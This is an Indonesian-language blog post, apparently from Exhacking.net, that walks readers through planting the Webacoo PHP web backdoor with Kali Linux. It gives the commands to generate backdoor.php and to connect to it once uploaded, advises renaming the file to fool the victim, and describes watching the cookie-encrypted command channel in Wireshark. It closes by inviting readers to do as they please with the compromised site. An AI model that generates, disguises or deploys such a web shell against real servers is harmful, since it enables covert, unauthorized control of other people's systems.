11/09/16

Backdooring Dengan Webacoo di Kali-Linux

Exhacking.net - Webacoo adalah web backdoor Script-Kit , yang menyediakan keperluan pentest dengan remote terminal pada web server dan berkomunikasi melalui HTTP.
Webacoo menggunakan cookies HTTP sebagai saluran komunikasi rahasia, perintah yang akan dieksekusi pada server korban dan respon yang dikirim menggunakan dienkripsi cookie dalam permintaan HTTP dan header respon HTTP.

Step by step untuk menjalankan Webacoo di Kali-Linux adalah sebagai berikut,, buka terminal dan masukan perintah :
# webacoo -g -o backdoor.php
Maka akan terbuat sebuah file dengan nama backdoor.php, untuk memanipulasi korban kalian dapat mengganti nama backdoor.php dengan nama yang kalian inginkan.
Langkah selanjutnya adalah mengirim atau mengupload file backdoor.php ke Web server target, setelah berhasil mengirimkan file tersebut, sekarang waktunya untuk Connect ke target dengan perintah :
# webacoo -t -u http://meru.mycompany.com/backdoor.php
Jika berhasil akan seperti ini
Selanjutnya kita akan menangkap semua komunikasi  web server  target dengan Wireshark. Silahkan buka Wiresharknya lalu atur konfigurasi Wireshark seperti ini, pilih Network Interface, dan mulai capture, serta mengatur filter untuk HTTP.

Screenshot di bawah ini menunjukkan permintaan HTTP untuk  web server target. Kita bisa melihat bahwa perintah yang akan dieksekusi pada target terkirim menggunakan cookie yang dienkripsi.
Setelah itu terserah kalian mau di apakan web tersebut, Sekian dan terimakasih :)
Unknown
Unknown

I'm Just A Writer blogger usual And Happy to do some experiments And my dreams Want To Become A programmer and i love Linux.

Tidak ada komentar:

Posting Komentar

Silahkan berkomentar jika ada yang ingin di tanyakan 😊